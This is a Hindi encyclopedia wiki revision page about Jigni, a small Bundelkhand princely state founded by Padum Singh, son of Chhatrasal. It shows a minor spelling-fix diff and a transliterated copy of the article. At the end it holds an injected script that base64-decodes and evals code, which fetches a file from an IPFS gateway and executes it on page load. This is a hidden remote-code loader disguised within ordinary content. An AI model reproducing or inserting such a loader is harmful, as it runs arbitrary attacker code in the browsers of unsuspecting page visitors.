Difference between revisions of "जिगनी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "राजनैतिक" to "राजनीतिक")
m (Text replacement - "पश्चात " to "पश्चात् ")
 
Line 1: Line 1:
 
'''जिगनी''' [[बुंदेलखंड]], [[मध्य प्रदेश]] में [[अंग्रेज़]] शासन काल तक एक छोटी-सी रियासत थी। इसके संस्थापक [[बुंदेला]] नरेश महाराज [[छत्रसाल]] के पुत्र पदुमसिंह थे।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=366|url=}}</ref>
 
'''जिगनी''' [[बुंदेलखंड]], [[मध्य प्रदेश]] में [[अंग्रेज़]] शासन काल तक एक छोटी-सी रियासत थी। इसके संस्थापक [[बुंदेला]] नरेश महाराज [[छत्रसाल]] के पुत्र पदुमसिंह थे।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=366|url=}}</ref>
  
*पदुमसिंह को अपने [[पिता]] की ओर से कोई जागीर नहीं मिली थी, किंतु इनके सौभाग्य से इन्हें इनके मामा ने अपने यहाँ जिगनी की जागीर पर बुला लिया, जिसके फलस्वरूप उनकी मृत्यु के पश्चात पदुमसिंह ही इस जागीर के स्वामी बने।
+
*पदुमसिंह को अपने [[पिता]] की ओर से कोई जागीर नहीं मिली थी, किंतु इनके सौभाग्य से इन्हें इनके मामा ने अपने यहाँ जिगनी की जागीर पर बुला लिया, जिसके फलस्वरूप उनकी मृत्यु के पश्चात् पदुमसिंह ही इस जागीर के स्वामी बने।
*1703 ई. में इन्होंने बदौरा को जीतकर जिगनी में मिला लिया। इसके पश्चात अनेक राजनीतिक उलट-फेरों के कारण इस रियासत में काफ़ी कांट-छांट हुई।
+
*1703 ई. में इन्होंने बदौरा को जीतकर जिगनी में मिला लिया। इसके पश्चात् अनेक राजनीतिक उलट-फेरों के कारण इस रियासत में काफ़ी कांट-छांट हुई।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 07:49, 23 June 2017

jigani buandelakhand, madhy pradesh mean aangrez shasan kal tak ek chhoti-si riyasat thi. isake sansthapak buandela naresh maharaj chhatrasal ke putr padumasianh the.[1]

  • padumasianh ko apane pita ki or se koee jagir nahian mili thi, kiantu inake saubhagy se inhean inake mama ne apane yahaan jigani ki jagir par bula liya, jisake phalasvaroop unaki mrityu ke pashchath padumasianh hi is jagir ke svami bane.
  • 1703 ee. mean inhoanne badaura ko jitakar jigani mean mila liya. isake pashchath anek rajanitik ulat-pheroan ke karan is riyasat mean kafi kaant-chhaant huee.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 366 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>